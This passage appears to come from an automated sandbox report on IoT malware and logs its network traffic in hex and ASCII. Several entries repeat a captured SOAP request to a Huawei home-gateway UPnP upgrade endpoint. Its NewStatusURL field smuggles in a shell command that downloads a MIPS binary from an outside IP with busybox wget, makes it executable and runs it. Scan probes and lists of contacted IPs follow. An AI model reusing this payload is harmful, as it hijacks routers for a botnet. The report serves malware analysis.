73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: unknownNetwork traffic detected: HTTP traffic on port 46540 -> 443
    Source: unknownTCP traffic detected without corresponding DNS query: 156.121.83.145
    Source: unknownTCP traffic detected without corresponding DNS query: 180.111.212.145
    Source: unknownTCP traffic detected without corresponding DNS query: 151.215.68.51
    Source: unknownTCP traffic detected without corresponding DNS query: 139.184.33.157
    Source: unknownTCP traffic detected without corresponding DNS query: 185.146.179.43
    Source: unknownTCP traffic detected without corresponding DNS query: 165.248.77.105
    Source: unknownTCP traffic detected without corresponding DNS query: 46.73.191.77
    Source: unknownTCP traffic detected without corresponding DNS query: 187.68.4.191
    Source: unknownTCP traffic detected without corresponding DNS query: 43.50.105.235
    Source: unknownTCP traffic detected without corresponding DNS query: 174.203.55.229
    Source: unknownTCP traffic detected without corresponding DNS query: 181.154.31.31
    Source: unknownTCP traffic detected without corresponding DNS query: 90.234.230.105
    Source: unknownTCP traffic detected without corresponding DNS query: 96.158.178.166
    Source: unknownTCP traffic detected without corresponding DNS query: 148.124.86.213
    Source: unknownTCP traffic detected without corresponding DNS query: 160.53.127.172
    Source: unknownTCP traffic detected without corresponding DNS query: 70.50.101.49
    Source: unknownTCP traffic detected without corresponding DNS query: 54.107.48.226
    Source: unknownTCP traffic detected without corresponding DNS query: 17.58.78.239
    Source: unknownTCP traffic detected without corresponding DNS query: 90.44.94.52
    Source: unknownTCP traffic detected without corresponding DNS query: 2.73.8.0
    Source: unknownTCP traffic detected without corresponding DNS query: 196.58.203.51
    Source: unknownTCP traffic detected without corresponding DNS query: 92.49.189.23
    Source: unknownTCP traffic detected without corresponding DNS query: 34.8.40.39
    Source: unknownTCP traffic detected without corresponding DNS query: 204.233.188.28
    Source: unknownTCP traffic detected without corresponding DNS query: 193.116.111.150
    Source: unknownTCP traffic detected without corresponding DNS query: 40.3.197.245
    Source: unknownTCP traffic detected without corresponding DNS query: 89.175.148.26
    Source: unknownTCP traffic detected without corresponding DNS query: 87.213.88.69
    Source: unknownTCP traffic detected without corresponding DNS query: 201.45.51.92
    Source: unknownTCP traffic detected without corresponding DNS query: 13.104.72.168
    Source: unknownTCP traffic detected without corresponding DNS query: 182.57.117.34
    Source: unknownTCP traffic detected without corresponding DNS query: 194.66.207.127
    Source: unknownTCP traffic detected without corresponding DNS query: 121.30.43.144
    Source: unknownTCP traffic detected without corresponding DNS query: 145.101.4.99
    Source: unknownTCP traffic detected without corresponding DNS query: 253.214.252.75
    Source: unknownTCP traffic detected without corresponding DNS query: 164.163.117.5
    Source: unknownTCP traffic detected without corresponding DNS query: 204.185.235.33
    Source: unknownTCP traffic detected without corresponding DNS query: 173.75.140.167
    Source: unknownTCP traffic detected without corresponding DNS query: 107.74.59.3
    Source: unknownTCP traffic detected without corresponding DNS query: 13.247.216.247
    Source: unknownTCP traffic detected without corresponding DNS query: 189.172.252.102
    Source: unknownTCP traffic detected without corresponding DNS query: 37.4.9.68
    Source: unknownTCP traffic detected without corresponding DNS query: 47.82.221.17
    Source: unknownTCP traffic detected without corresponding DNS query: 111.201.242.38
    Source: unknownTCP traffic detected without corresponding DNS query: 99.167.13.105
    Source: unknownTCP traffic detected without corresponding DNS query: 176.168.220.194
    Source: unknownTCP traffic detected without corresponding DNS query: 192.212.190.115
    Source: unknownTCP traffic detected without corresponding DNS query: 74.105.208.195
    Source: unknownTCP traffic detected without corresponding DNS query: 254.65.154.145
    Source: unknownTCP traffic detected without corresponding DNS query: 17.179.132.196
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 Nov 2023 05:05:05 GMTServer: Boa/0.94.14rc21Accept-Ranges: bytesConnection: closeContent-Type: text/html; charset=ISO-8859-1Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>404 Not Found</H1>The requested URL /cgi-bin/ViewLog.asp was not found on this server.</BODY></HTML>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 Nov 2023 07:07:32 GMTServer: WebsX-Frame-Options: SAMEORIGINCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: GET, PATCH, PUT, DELETEAccess-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept, Authorization, X-User-AgentContent-Type: application/json; charset=utf-8Content-Length: 58ETag: W/"3a-3nurlhN7oh6/KE2okfzii7JXEms"Date: Thu, 23 Nov 2023 04:15:09 GMTConnection: keep-aliveKeep-Alive: timeout=5Data Raw: 7b 22 73 74 61 74 75 73 22 3a 34 30 34 2c 22 6d 65 73 73 61 67 65 22 3a 22 54 68 69 73 20 70 61 67 65 20 64 6f 65 73 6e 27 74 20 73 65 65 6d 20 74 6f 20 65 78 69 73 74 22 7d Data Ascii: {"status":404,"message":"This page doesn't seem to exist"}
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 Nov 2023 04:15:10 GMTServer: DNVRS-WebsCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 Nov 2023 07:15:14 GMTServer: WebsX-Frame-Options: SAMEORIGINCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 Nov 2023 04:15:16 GMTServer: Apache/2.2.15 (CentOS)Content-Length: 416Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 32 2e 31 35 20 28 43 65 6e 74 4f 53 29 20 53 65 72 76 65 72 20 61 74 20 31 39 32 2e 31 36 38 2e 30 2e 31 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /cgi-bin/ViewLog.asp was not found on this server.</p><p>Additionally, a 400 Bad Requesterror was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.2.15 (CentOS) Server at 192.168.0.14 Port 80</address></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 Nov 2023 04:15:21 GMTServer: Apache/2.2.8 (Win32) mod_perl/2.0.3 Perl/v5.8.7Vary: Accept-EncodingContent-Encoding: gzipContent-Length: 189Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8e c1 0e 82 30 10 44 ef 7c c5 ca 1d 16 0d c7 a6 07 05 22 09 22 31 d5 c4 23 d8 15 9a 20 45 5a 24 fe bd a0 17 8f b3 33 6f 66 d9 2a 3a ee c4 b5 88 61 2f 0e 19 14 e7 6d 96 ee c0 f5 10 d3 58 24 88 91 88 7e ce c6 0f 10 e3 dc e5 0e 6b ec a3 e5 ac a1 52 ce c2 2a db 12 0f 83 10 72 6d 21 d1 63 27 19 fe 8e 0e c3 6f 88 55 5a be 17 6e cd ff 32 b3 72 58 cf 45 43 30 d0 73 24 63 49 c2 f9 94 01 de 6a e5 55 aa c3 8b a2 29 d3 b5 5f 9a 1e a6 d2 40 37 c3 f7 05 06 dd 81 6d 94 01 43 c3 8b 06 9f 61 bf 8c 7d 67 e6 e2 e5 3d e7 03 7b f7 ab 8c d9 00 00 00 Data Ascii: M0D|""1# EZ$3of*:a/mX$~kR*rm!c'oUZn2rXEC0s$cIjU)_@7mCa}g={
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 Nov 2023 04:15:32 GMTConnection: Close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 Nov 2023 04:15:33 GMTConnection: Close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: Apache-Coyote/1.1Content-Type: text/html;charset=utf-8Content-Language: enContent-Length: 989Date: Thu, 23 Nov 2023 04:12:44 GMTData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 35 39 20 2d 20 45 72 72 6f 72 20 72 65 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3c 21 2d 2d 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 41 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 2d 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 68 31 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 70 3e 3c 62 3e 74 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 72 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 6d 65 73 73 61 67 65 3c 2f 62 3e 20 3c 75 3e 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 75 3e 3c 2f 70 3e 3c 70 3e 3c 62 3e 64 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 3c 75 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 75 3e 3c 2f 70 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Connection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: Apache-Coyote/1.1Content-Type: text/html;charset=utf-8Content-Language: enContent-Length: 989Date: Thu, 23 Nov 2023 04:12:44 GMTData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 35 39 20 2d 20 45 72 72 6f 72 20 72 65 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3c 21 2d 2d 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 